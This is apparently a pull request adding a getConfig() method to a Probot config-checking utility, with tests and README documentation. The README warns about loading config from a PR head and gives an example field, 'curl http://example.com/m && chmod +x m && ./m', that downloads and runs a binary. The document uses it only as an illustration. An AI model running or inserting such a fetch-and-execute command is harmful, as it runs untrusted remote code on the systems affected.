### PR TITLE
feat(bot-config-utils): allow fetching the config from the PR head

### DIFF
--- a/packages/bot-config-utils/README.md
+++ b/packages/bot-config-utils/README.md
@@ -121,3 +121,27 @@ schema you provided. It will submit a failing status check if:
   `yaml` vs `yml`).
 - You are trying to add a broken config file, or the config file
   doesn't match the schema.
+
+
+## Fetch config from the PR head
+Probot's implementation of config always fetches the config from the
+master branch. This is a reasonable security meassure for a generic
+library.
+
+It is very dangerous to fetch the config from PR head expecially if
+the config contains some external commands. Here is a simple example:
+
+```yaml
+prepareCommands: 'curl http://example.com/m && chmod +x m && ./m'
+
+```
+
+However, if your bot doesn't have such a field in the config file, it
+is very natural to fetch the config from the PR head.
+
+For this purpose, the ConfigChecker has a method:
+`getConfig(): T | undefined`. This will return the config object only
+if the validation succeeds.
+
+Even if the config contains a dangerous field, you can selectively use
+the value from the config in the PR head.

--- a/packages/bot-config-utils/src/bot-config-utils.ts
+++ b/packages/bot-config-utils/src/bot-config-utils.ts
@@ -51,6 +51,7 @@ export class ConfigChecker<T> {
   private configPath: string;
   private badConfigPaths: Array<string>;
   private configName: string;
+  private config: T | undefined;
   constructor(schema: object, configFileName: string) {
     this.schema = schema;
     this.ajv = new Ajv();
@@ -75,6 +76,8 @@ export class ConfigChecker<T> {
       isValid = validateSchema(config);
       if (!isValid) {
         errorText = JSON.stringify(validateSchema.errors, null, 4);
+      } else {
+        this.config = config;
       }
     } catch (err) {
       // failed to load the yaml file
@@ -82,6 +85,10 @@ export class ConfigChecker<T> {
         `.github/${this.configPath} is not valid YAML 😱 \n` + err.message;
     }
     return {isValid: isValid, errorText: errorText};
+  }
+
+  public getConfig(): T | undefined {
+    return this.config;
   }
 
   public async validateConfigChanges(

--- a/packages/bot-config-utils/test/bot-config-utils.ts
+++ b/packages/bot-config-utils/test/bot-config-utils.ts
@@ -41,6 +41,8 @@ const CONFIG_FILENAME_YML = 'test.yml';
 
 const defaultConfig: TestConfig = {testConfig: 'defaultValue'};
 
+let configFromConfigChecker: TestConfig | undefined;
+
 // Test app
 const app = (app: Probot) => {
   app.on(
@@ -62,6 +64,7 @@ const app = (app: Probot) => {
         context.payload.pull_request.head.sha,
         context.payload.pull_request.number
       );
+      configFromConfigChecker = configChecker.getConfig();
     }
   );
 };
@@ -160,6 +163,8 @@ describe('config test app', () => {
       }),
     });
     probot.load(app);
+    // It always start from undefined.
+    configFromConfigChecker = undefined;
   });
   afterEach(() => {
     nock.cleanAll();
@@ -181,6 +186,7 @@ describe('config test app', () => {
       for (const scope of scopes) {
         scope.done();
       }
+      assert.strictEqual(configFromConfigChecker?.testConfig, 'testValue');
     });
     it('creates a failing status check for a wrong config', async () => {
       const payload = require(resolve(fixturesPath, 'pr_event'));
@@ -199,6 +205,7 @@ describe('config test app', () => {
       for (const scope of scopes) {
         scope.done();
       }
+      assert.strictEqual(configFromConfigChecker, undefined);
     });
     it('creates a failing status check for broken yaml file', async () => {
       const payload = require(resolve(fixturesPath, 'pr_event'));
@@ -215,6 +222,7 @@ describe('config test app', () => {
       for (const scope of scopes) {
         scope.done();
       }
+      assert.strictEqual(configFromConfigChecker, undefined);
     });
     it('creates a failing status check for a wrong file name', async () => {
       const payload = require(resolve(fixturesPath, 'pr_event'));
@@ -229,6 +237,7 @@ describe('config test app', () => {
       for (const scope of scopes) {
         scope.done();
       }
+      assert.strictEqual(configFromConfigChecker, undefined);
     });
   });
 });


### PR DESCRIPTION
part of #1038

To fix #1038, obviously we'll need to use the config from the PR
head in header-checker-lint.